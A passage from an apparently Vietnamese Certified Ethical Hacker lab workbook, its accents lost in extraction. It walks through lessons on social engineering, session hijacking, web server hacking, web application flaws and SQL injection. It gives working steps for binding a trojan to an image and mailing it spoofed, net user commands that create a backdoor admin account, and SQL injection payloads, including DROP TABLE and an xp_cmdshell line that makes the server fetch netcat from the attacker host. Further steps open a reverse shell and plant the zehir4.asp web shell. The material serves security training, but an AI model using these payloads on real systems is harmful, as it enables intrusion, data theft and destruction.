Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 74
Bài 7:
Social Engineering
I/ Gii Thiu
K thut la đo (Social Engineering) là mt th thut đc nhiu hacker s dng cho
các cuc thâm nhp vào các h thng mng, máy tính. ây là mt trong nhng phng thc
hiu qu đ đánh cp mt khu, thông tin, tn công vào h thng.
Di đây là câu chuyn có tht v mt trong nhng hacker ni ting nht th gii
trong vài nm tr
li đây - Kevin Mitnick (M, tng b 8 nm tù vì ti tn công vào h thng
máy tính), chuyên gia hàng đu v k thut Social Engineering. Lên k hoch tn công vào
công ty X, Kevin vn dng k nng này đ dò tìm thông tin liên quan đn ông tng giám đc
và mt tr lý ca ông này. Li dng lúc hai ngi đi công tác, anh ta s dng Call ID gi,
nhái ging nói ca viên tr lý đ gi đn qun tr mng công ty, yêu cu gi mt kh
u đng
nhp vào h thng ca tng giám đc vì ngài đã quên mt khu. Qun tr viên kim tra mt
vài thông tin v "viên tr lý", nhng Kevin đã có đ thông tin và s khôn ngoan đ tr li. Kt
qu là Kevin đã ly đc mt khu và kim soát toàn b h thng mng ca công ty X.
Mt hình thc la đo khác: Mt ngày xu tri nào đó, bn nhn đc đ
in thoi,
đu dây bên kia là mt ging nói ngt ngào: "Chào anh, dch v mà anh đang s dng ti
công ty chúng tôi hin đang b trc trc vi account (tài khon) ca anh. ngh anh gi gp
thông tin v tài khon cho chúng tôi đ điu chnh li". Mi nghe qua tng nh đây là mt
kiu la thô thin, nhng xác sut thành công rt cao, đc bit khi ging nói đó d thng nh
my cô trc tng đài 1080! Phng cách la đo tng t là dùng k thut "Fake Email
Login". V nguyên tc, mi khi đng nhp vào hp th thì chúng ta phi đin thông tin tài
khon gm username và password ri gi thông tin đn mail server đ x lý. Li dng điu
này, hacker đã thit k các trang đng nhp gi (Fake Login) đ các thông tin đc gi đn
cho h.
Tóm li, k thut Social Engineering rt
đa dng, phong phú và cng ht sc nguy
him do tính hiu qu và s ph bin. K thut này không đòi hi phi s dng quá nhiu yu
t k thut, thm chí không có liên quan đn k thut thun túy (non-technical). Hacker có th
thc hin phng cách này thông qua th tín, e-mail, đin thoi, tip xúc trc tip, thông qua
ngi quen, các mi quan h cá nhân nhm dn d, khai thác các thông tin do vô tình b tit
l t
phía ngi dùng. VN, k thut này còn khá mi nên không him trng hp b đánh
la mt cách d dàng. Chng hn nm ngoái, hàng lot game th MU Global đã mt sch
sành sanh tài sn (o), khi ngây th đin thông tin tài khon ca mình vào mt e-mail gi mo
admin MU ca hacker!
(Trích dn)
II/ Các bài Lab:
Bài Lab 1: Gi email nc đính kèm Trojan
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 75
thc hin bài Lab này, ta s dng chng trình Mini-binder đ ghép file trojan vi
hình nh, thay đi icon và chng trình Outlook đ gi email nc danh.
Ghép file hình nh và file trojan, đu tiên ta to 1 file trojan, ly 1 file nh và file ico
bt k đ ghép.
Ta s dng lnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ
ghép file trojan svchost.exe vi cathu.jpg và vi icon là 60.ico.
Tip theo, ta nén file trojan mi bng Winrar li nhiu ln đ tránh chng trình Anti-
virus(tùy theo phiên bn Anti-virus, tuy nhiên hu ht các trojan không qua mt đc các
chng trình này) và thay đi thông tin ca outlook.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 76
Ta vào ToolåOptionåMail setupåView Accountå Chn Account cn thay đi và
thay đi thông tin Your Name và E-mail Address.
Tip theo Attach file đính kèm vào và gi Email đi. Trong bài Tác gi gi ti đa ch
email
, và sau đó check mail đ kim tra th xem mail đã đn cha.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 77
Bài 8:
Session Hijacking
I/ Gii thiu:
Nh ta đã bit v sniffer (nghe lén trong mng), Hacker có th ly bt k thông tin gì
không đc mã hóa, hay có th fake CA đ có th ly thông tin trong giao thc HTTPS, bây
gi ta có thêm 1 k thut na là session hijacking. thc hin đc bài lab này trc tiên ta
phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t
phía máy nn nhân.
II/ Thc hin bài Lab
Trong bài Lab, tác gi s dng Vmware đ thc hi
n, s dng máy đ th nghip
TELNET và SSH. Còn 2 máy còn li 1 s dng Window 2000(đã cài sn tool T-sight) và 1 s
Linux đ test SSH.
Vic cài đt phn mm khá d dàng, bn cn phi thêm phn driver và chuyn v IP
192.168.200.0/24 do đang s dng bn Trial.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 78
Sau khi cài đt xong, trên máy 192.168.200.1 thit lp cho phép các máy khác telnet.
Và t máy 192.168.200.2 telnet đn máy 192.168.200.1.
Và d liu thu đc t máy 192.168.200.2, s dng tính nng Take Over trong Tool
T-sight đ ly session.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 79
Sau khi Session b ly, session t máy Telnet s b “ Lost connection” và ngi s
dng trong trng hp này không bit là mình b “Lost Connection “bi nguyên nhân nào.
Bây gi ta bt Service SSH ca máy Linux bng lnh “ Service sshd” và test th session
hijacking đi vi traffic ssh.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 80
Bài 9:
Hacking Web Server
I/ Gii thiu:
Thông thng đ Hacking 1 Web Server, Hacker thng phi xem th Web Server
đang chy h điu hành gì và chy nhng sercice gì trên đó, h điu hành thông thng là các
h điu hành Win 2000 Server, Win 2003 Server, Redhat.v.v. Các Service bao gm Apache,
IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H điu hành b li hay service khác
b li có th dn ti vic mt quyn kim soát ca h thng. Trong bài thc hành ca phn
này, tác gi
gii thiu li ca h điu hành là DCOM và li ng dng khác là Server-U,
Apache(FTP Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân.
II/ Thc Hin bài lab.
Bài Lab 1: Tn công Web Server Win 2003(li Apache)
bit đc máy Server ca h thng có b li hay không, ta s dng dng phn mm
quét đ kim tra. (Phn này đã đc hc trong scaning).
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 81
Ta không thy thông tin v FTP Server đây, do phn mm Retina ch có tính nng
nhn din các Service ca Microsoft và nhng Service thông dng. Còn các Service không
thông dng hn thì phn mm ch thy di dng m port. Trong trng hp này ta thy m
port 21.
Ta s dng Metasploit đ khai thác li Apache và ly đc (Console).
Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 82
Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1. Trc tiên ta
to 1 user và add user này vào nhóm admin bng s dng lnh.
Net user vsichao vsichao /add
//thêm user
Net Localgroup Administrators vsichao /add
//đa user vào nhóm Admin
Ta có th kim ta li bng lnh “ Net user” đ kim tra th user ca mình đã đc
quyn admin hay cha.
Tip theo ta th remote Desktop vào máy bng lnh “ mstsc /v 192.168.200.6” . Nu
không đc ta s dng file Openrdp.vbs đ m Remote Desktop. Ta s dng chng trình
Cisco TFTP Server đ đy file này Server nn nhân.
S dng lnh tftp máy nn nhân đ ly file
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 83
Add user vào và nâng quyn lên Administrator.
Remote Desktop vào vi user là cehclass thành công, nh vy ta đã hoàn toàn kim
soát đc máy nn nhân.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 84
Bài lab 2: Khai thác li ng dng Server U
Tng t nh bài trên, ta s dng chng trinh nmap đ xác đnh version ca ServerU
và s dng metaesploit đ tn công.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 85
Bài 10:
WEB APPLICATION HACKING
I/ Gii thiu:
ng dng Web thông thng s dng d liu đu vào trong các truy cp HTTP (hoc
trong các tp tin) nhm xác đnh kt qu phn hi. Tin tc có th sa đi bt k phn nào ca
mt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, và thm chí
field n (hidden fields), nhm vt qua các c ch bo mt. Các tn công ph bin dng này
bao gm:
- Chy lnh h th
ng tùy chn
- Cross site scripting
- Li tràn b đm
- Tn công Format string
- SQL injection
- Cookie poisoning
- Sa đi field n
Trong bài thc hành này, ta th khai thác các l hng Cross Site Cripting, Format
string, Cookie Manipulation, Authorization Failure.
II/ Các Bài Lab
Bài Lab 1: Cross Site Scripting
u tiên ta login vào bng username “jv” và password “ jv789” và chn chc nng
“post message”. Sau đó ta post script vào phn message text.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 86
Sau đó ta submit đ post script này lên. Ta s dng F5 đ Refresh li trình duyt và
thy xut hin.
Lúc này trình duyt ca nn nhân vô tình đã thc hin script đc user post lên Server.
Da vào script này, tin tc có th n cp cookie ca nn nhân và log in vào h thng.
Bài Lab 2: Insufficient Data Validation
Trong bài Lab này khi chuyn tin t tài khon này sang tài sn khác, tham s amout
luôn luôn phi ln hn 0. Tuy nhiên trong 1 s trng hp Hacker có th thay đi con s này
là s âm bng nhng chng trình “http proxy”. Kt qu này có th gây hi đn các khon tài
chính ca ngân hàng HackmeBank.
Ta th chuyn v
i giá tr Amout 100 t tài khon bt k sang tài khon khác
Kt qu thành công. Ta tip tc chuyn thêm 1 ln na nhng vi giá tr là -100. Tuy
nhiên do có kim tra di phía client nên vic chuyn tin không thành công.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 87
Bây gi ta s dng chng trình Webscarab làm http proxy và thay đi thông s đc
POST lên Server.
Kt qu tr v t Server vic chuyn tin vn thành công
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 88
Ta kim tra trong Transaction thy có lu li vic chuyn tin.
Bài Lab 3: Cookie Manipulation
Trong lúc login, ta xem trong Cookie có tham s CookieloginAttempts, tham s này
dùng đ lock session khi ai đó c gng login vào khi nhp sai hay không bit password. Tham
s này đm t 5 đn 0. Khi tham s này bng 0 là lúc session b Lock. Ta có th s dng
Webscarab đ thay đi tham s này đ tránh vic Server lock session.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 89
Bài Lab 4: Authorization Failure
u tiên ta vào xem các account ca user “jc” password “jc789”.
Ta thy account Number là 5204320422040005, 5204320422040006, 520432
0422040007, 5204320422040008. User jc ch quán lý đc các account thông s trên. Tuy
nhiên ta chú ý đn phn URL khi s dng tính nng “View Transaction”.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 90
Ta thay thông s 5204320422040005 bng thông s 5204320422040004(thông s này
không thuc account qun lý ca user jc). Nh vy web site đang b li phân quyn.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 91
Bài 11:
SQL INJECTION
I/ Gii thiu v SQL Injection:
ây là K thut tn công này li dng nhng l hng trên ng dng(không kim tra k
nhng kí t nhp t ngi dùng). Thc hin bng cách thêm các mã vào các câu lnh hay câu
truy vn SQL (thông qua nhng textbox) trc khi chuyn cho ng dng web x lý, Server s
thc hin và tr v cho trình duyt (kt qu câu truy vn hay nhng thông báo li) nh đó mà
các tin tc có th thu thp d
liu, chy lnh (trong 1 s trng hp) và sau cho có th chim
đc quyn kim soát ca h thng. Sau đây là 1 s th thut cn bn
1) Ly tên table và column hin hành:
Structure:
Login page (or any injection page)::::
username: ' having 1=1
KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the
select list because it is not contained in an aggregate function and there is no GROUP BY
clause.
> Ta có đc TABLE VICTIM
Tip tc
username: ' group by VICTIM.ID having 1=1
KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the
select list because it is not contained in either an aggregate function or the GROUP BY
clause.
Vy là ta có column Vuser
UNION nh mà hiu qu
Vâng tha các bn, ta có th dùng nó đ ly đc gn nh mi th .
Trc ht tôi xin nói s qua cái Structure c
a nó:
Login page::::
username: ' Union select [column] from [table] where [column2= ]
password: everything
Vd: Gi s ta đã bit 2 column username và password trong table VTABLE cua db victim là
VUSER và VPASS thì ta làm nh sau
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 92
username: ' Union select VPASS from VTABLE where VUSER='admin' (1)
password: everything
(1): Trong trng hp này admin là mt user mà bn bit nu không có th b trng, nó s
cho bn user đu tiên
KQ:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement
containing a UNION operator must have an equal number of expressions in their target lists.
Nu KQ ra nh trên có ngha là bn phi union thêm nhiu column na đ tt c column ca
table VTABLE đc Union ht. Structure ca nó nh sau:
username: ' Union select VPASS,1,1,1 1,1 from VTABLE where VUSER='admin' (1)
password: everything
Bn hãy thêm ",1" cho đn khi kt qu ra đi loi nh
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'tuibihackroi' to a column of data type int.
Nh vy Pass ca user 'admin' là 'tuibihackroi'
2) Ly ht value ca mt column đã bit trong m
t table đã bit
Bí quyt đây là “Not in” Structure ca nó nh sau (s dng ví d vi column ca bài trc):
Vi Vuser là admin ta có th ly đc các user khác
Login Page::::::
username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’)—
Sau đó chúng ta s thu đc thêm mt user na và ch vic chèn vào trong Not in (vd: Not in
(‘admin’,’hacker’,….)) c làm tip tc nh th ta s có ht mi user(d nhiên sau đó là mi
password).
**** Ð ly danh sách tên các user theo mt quy đnh mà bn chn, ví d chi ly các user có
cha t
admin chng hn ta dùng “like”: cu trúc
Login Page::::::
username: ‘ Union select Vuser,1,1,1…,1 from Vtable where username not in (‘admin’) like
%admin%—
3) Ly ht table và column ca ca database:
Bí quyt chính là table này ca database: INFORMATION_SCHEMA.TABLES vi column
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 93
TABLE_NAME (cha toàn b table) và table: INFORMATION_SCHEMA.COLUMNS vi
column COLUMN_NAME (cha toàn b column)
Cách s dng dùng Union:
Login page:::::::
username: ‘ UNION SELECT TABLE_NAME,1,1,1…,1 FROM
INFORMATION_SCHEMA.TABLES WHERE …….
Nh vy ta có th ly đc ht table, sau khi có table ta ly ht column ca table đó:
Login page:::::::
username: ‘ UNION SELECT COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’… ’ and ……
Trên đây là nhng điu cn bn nht v SQl injection mà tôi có th cung cp cho các bn, còn
làm đc tt hay không thì phi có mt chút sáng to na hy vng nó giúp ích cho các bn
mt chút khi gp mt site b SQl injection
4)Không s dng UNION:
Nu các b
n ngi dùng Union vì nhng bt tin ca nó thì các bn có th dùng "Convert" mt
cách d dàng hn đ thu thp info qua các thông báo li
Structure:
login page::::
user: ' + convert (int,(select @@version))
Trên là mt ví d đ bn ly version, gi đây mun ly bt c info nào bn ch cn thay vào
cái "select @@version" nhng nh nu là ln đu tiên get info thì thêm TOP 1 vào nhé
vd: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))
Lu ý: Nu các bn s dng không đc thì có th vì du + không đc chp nhn, lúc đó
hãy thay nó === %2b
vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))
5) Run command SQL:
run command bn có th dùng du ";"
Structure:
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 94
login page:::::
user:' ; [command]
vd: '; DROP TABLE VTABLE
II/ Thc Hành Bài Lab
Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web đ tn công vào
Server 2000(192.168.1.46) và s upload lên Server 2000 trojan webbase, sau đó kim soát
Server này.
u tiên s dng phn mm Acunetix đ quét xem Server Web có b li ng dng gì
không??
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 95
Ta có th test bng tay trong tình hung này bng cách thêm du “ ‘ “ trong form
login.
Sau đây là 1 s đon mã đ ly thông tin v Server khi bit Server b li SQL.
1/lay ten Server name
'and 1=convert(int,@@servername) sp_password
2/lay database name
'and 1=convert(int,db_name()) sp_password
3/kiem tra system user
'and 1=convert(int,system_user) sp_password
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 96
4/'and 1=convert(int,@@version) sp_password
5/Lay thong tin table userinfo
' having 1=1 (xem table hien hanh)
' group by userinfo.username having 1=1 (xem column tiep theo)
Sau khi ly thông tin v Server, Hacker th upload lên Server trojan netcat bng cách
s dng gi hàm shell trong SQL và tftp. Ta đánh vào form login câu lnh sau(phi nh là
máy client s dng TFTP Server):
';exec master xp_cmdshell "tftp -i 192.168.1.44 get nc123.exe";
Câu lnh này đc thc thi h thng Server thông qua SQL, nó s load nc123.exe t
TFTP Server 192.168.1.44. Ta kim tra trên TFTP Server file đã đc gi hay cha.
Sau khi upload thành công trojan netcat, vic bây gi là ta phi chy nó và s dng
telnet ngc ra bên ngoài. Vì lúc này chúng ta đang đng sau Firewall nên không th lng
nghe trên port vì client ngoài Firewall không th connect vào đc.
Chy lng nghe phía Client
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 97
Telnet net ngc ra ngoài t Server.
Và kt ni netcat đc hình thành sau khi telnet ngc ra t Server, lúc này chúng ta
đã by pass đc Firewall.
Giáo trình bài tp C|EH Tài liu dành cho hc viên
VSIC Education Corporation Trang 98
Sau khi kt ni đc màn hình console ca Window, ta tip tc upload thêm 1 trojan
di dng web thông qua TFTP.
Trojan web mà chúng ta s dng là zehir4.asp, đây là trojan khá nhiu tin dng. T
trojan này ta có th thc hin d dàng vic xóa Database, vic download các file t Server
2000 v máy ca mình thông qua Port Web